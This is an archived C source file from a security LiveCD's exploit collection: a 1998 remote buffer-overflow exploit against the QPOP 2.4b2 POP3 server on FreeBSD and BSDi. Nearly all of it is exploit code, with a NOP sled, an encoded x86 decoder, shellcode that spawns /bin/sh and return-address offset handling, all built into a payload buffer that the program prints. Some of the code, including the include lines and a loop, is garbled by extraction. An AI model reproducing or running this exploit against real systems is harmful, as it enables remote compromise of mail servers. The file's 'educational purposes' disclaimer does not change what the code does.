Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / pop3 / qpop242.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 49 lines

/* * QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5. * and BSDi 2.1 * 24-Jun-1998 by stran9er * * Based: * FreeBSD/BSDi shellcode from some bsd_lpr_exploit.c by unknown author. * x86 decode.bin/encode.c by Solar Designer. * * Disclaimer: * this demonstration code is for educational purposes only! DO NOT USE! */ #include #include #include #define ESP 0xefbfd480 #define BMW 750 main(int argc, char **argv) { int i,t,offset = 500; char buf[1012]; char nop[] = "\x91\x92\x93\x94\x95\x96\x97\xF8\xF9\xFC\xFD"; char decode_x86[] = "\x68\x5D\x5E\xFF\xD5\xFF\xD4\xFF\xF5\x8B\xF5\x90\x66\x31\x7D\x30" "\x33\x7D\x30\x90\x90\x8B\xC7\x66\x2D\x5D\x5D\xD5\x21\x8B\xFD\x83" "\xC7\x02\x8B\xEF\x90\x90\x90\x8A\xE0\x8B\xFE\x83\xC6\x01\x32\x67" "\x30\x30\x67\x30\x90\x75\xD5";/*\x79\x5F\x7D\x60\x5D\x63\x70\x5E"*/ char shellcode_BSDi[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; fprintf(stderr, "QPOP (FreeBSD v 2.4b2) remote exploit by stran9er. - DO NOT USE! -\n"); if (argc>1) offset = atoi(argv[1]); fprintf (stderr,"Using offset %d (esp==0x%x)",offset,ESP); offset+=ESP; fprintf (stderr," esp+offset=0x%x\n\n",offset); for(i=0;i> 24) buf[1007] = (offset & 0x00ff0000) >> 16; buf[1006] = (offset & 0x0000ff00) >> 8; buf[1005] = (offset & 0x000000ff); printf("%s\n",buf); } /* www.hack.co.za [2000]*/